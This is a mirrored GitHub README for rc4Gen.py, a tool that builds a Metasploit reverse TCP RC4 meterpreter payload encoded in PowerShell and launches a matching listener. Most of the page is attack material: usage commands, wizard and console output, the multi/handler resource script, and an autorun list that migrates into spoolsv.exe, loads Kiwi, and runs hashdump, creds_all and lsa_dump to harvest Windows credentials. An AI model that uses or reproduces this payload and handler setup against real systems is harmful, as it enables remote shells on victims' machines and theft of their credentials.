Code Monkey home page Code Monkey logo

rc4gen's Introduction

rc4Gen

            __ __    ____                      
           /\ \\ \  /\  _`\                    
 _ __   ___\ \ \\ \ \ \ \L\_\     __    ___    
/\`'__\/'___\ \ \\ \_\ \ \L_L   /'__`\/' _ `\  
\ \ \//\ \__/\ \__ ,__\ \ \/, \/\  __//\ \/\ \ 
 \ \_\\ \____\\/_/\_\_/\ \____/\ \____\ \_\ \_\
  \/_/ \/____/   \/_/   \/___/  \/____/\/_/\/_/


rc4Gen.py v1.10122016
Description: Generates a MSF Reverse TCP RC4 payload encoded in Powershell to the clipboard.
Automatically launches the corresponding MSF Multi/Handler.
The Multi/Handler listener is weaponized to automatically migrate into the spoolsv.exe process, load Kiwi, run sysinfo, hashdump, creds_all and lsa_dump.
rc4Gen.py supports both command-line parameters and a Wizard driven menu.
Created by: Nick Sanzotta/@beamr

Installation:

git clone https://github.com/NickSanzotta/rc4Gen.git
cd rc4Gen
python rc4Gen.py --help

Default Values:

If a parameter is not defined it's default value will be choosen.
Default values listed below.

lport = '443'
rc4Password = 'rc4M4g1c'
verbose = 'off'
listener = 'on'

Usage(CLI):

Usage: python rc4Gen.py --lhost <OPTIONS>
Example: python rc4Gen.py --lhost 10.0.0.1 --lport=445 --pass=Password123 --verbose=on --listener=off

 Tips:
 If LHOST is not defined the Wizard menu will be launched.


 --lhost=<> This will define the local host used for the reverse_tcp_rc4 payload.

 --lhost=<443> is default, this value will define the local port used for the reverse_tcp_rc4 payload.

 --pass=<rc4M4g1c> is default, this value will define the RC4PASSWORD used for the reverse_tcp_rc4 payload.

 --verbose=[OFF] is default, this will copy payload to Clipboard.

 --verbose=[ON] is not default, this will print payload to STDOUT.

 --listener[ON] is default, this will automatically launch the corresponding MSF Multi/Handler.

 --listener[OFF] is not default, this will NOT launch MSF multi/handler.
 
 Misc:

 --help <help>		Prints this help menu.

Usage(Wizard):

External IP: 100.255.255.255
Internal IP: 10.37.242.7

You did not specifiy the LHOST, wizard menu has launched:

Enter LHOST for payload[100.255.255.255]:10.37.242.7
ENTERED: "10.37.242.7"

Enter LPORT for payload[443]:
ENTERED: "443"

Enter RC4PASSWORD for payload[rc4M4g1c]:
ENTERED: "rc4M4g1c"

TIP: Verbosity [ON] will print payload to STDOUT.
TIP: Verbosity [OFF] will copy payload to Clipboard.
Verbosity[OFF]:
ENTERED: "OFF"

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 421 (iteration=0)
x86/shikata_ga_nai chosen with final size 421
Payload size: 421 bytes
Saved as: rc4_payload.ps1

Payload Copied to Clipboard:

PAYLOAD: reverse_tcp_rc4
LHOST: 10.37.242.7
LPORT: 443
RC4PASSWORD: rc4M4g1c
TIP: Listener [ON] will automagically launch a MSF listener.
listener[ON]:
ENTERED: "ON"

[*] Processing rc4_listener.rc for ERB directives.
resource (rc4_listener.rc)> use multi/handler
resource (rc4_listener.rc)> set PAYLOAD windows/meterpreter/reverse_tcp_rc4
PAYLOAD => windows/meterpreter/reverse_tcp_rc4
resource (rc4_listener.rc)> set LHOST 10.37.242.7
LHOST => 10.37.242.7
resource (rc4_listener.rc)> set LPORT 443
LPORT => 443
resource (rc4_listener.rc)> set Rc4PASSWORD rc4M4g1c
Rc4PASSWORD => rc4M4g1c
resource (rc4_listener.rc)> set ExitOnSession false
ExitOnSession => false
resource (rc4_listener.rc)> set AutoRunScript multi_console_command -rcautorun_commands.rc
AutoRunScript => multi_console_command -rcautorun_commands.rc
resource (rc4_listener.rc)> exploit -j -z
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.37.242.7:443 
[*] Starting the payload handler...
msf exploit(handler) > exit
    ...

Autorun Script:

The Multi/Handler listener is weaponized to automatically migrate into the                
spoolsv.exe process, load Kiwi, run sysinfo, hashdump, creds_all and lsa_dump.

A file called 'autorun_commands.rc' is created with the following commands:

migrate -N spoolsv.exe
load kiwi
sysinfo
hashdump
creds_all
lsa_dump

To Do:

autorun script ON/off feature (add)

rc4gen's People

Stargazers

X7 avatar avatar N3XUS avatar PHILEMON SUNDAY JOEL avatar Maxim Zhukov avatar Khiem Nguyen avatar Mikal avatar binkybear avatar Josh avatar

Watchers

James Cloos avatar avatar

Forkers

vasco2016 sector009 olivierh59500 sireof gavz

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.